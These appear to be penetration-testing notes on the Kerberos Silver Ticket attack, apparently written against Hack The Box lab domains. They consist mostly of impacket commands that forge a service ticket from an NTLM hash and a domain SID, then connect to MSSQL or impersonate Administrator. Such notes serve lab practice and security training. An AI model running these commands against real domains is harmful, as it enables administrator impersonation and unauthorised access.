Silver Ticket

The username and password of the service account is needed for this attack

Create a NTLM hash of the password

1443EC19DA4DAC4FFC953BCA1B57B4CF

Next you need the Domains SID

*Evil-WinRM* PS C:\SQLSERVER\Logs> Get-ADDomain

S-1-5-21-4078382237-1492182817-2568127209

Create the ticket and connect with to mssql

impacket-ticketer -nthash <hash> -domain-sid <SID> -domain sequel.htb -spn Adot8/dc.sequel.htb administrator

KRB5CCNAME=administrator.ccache impacket-mssqlclient -k administrator@dc.sequel.htb

impacket-getST -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$:pass -dc-ip 192.168.193.40

Last updated 6 months ago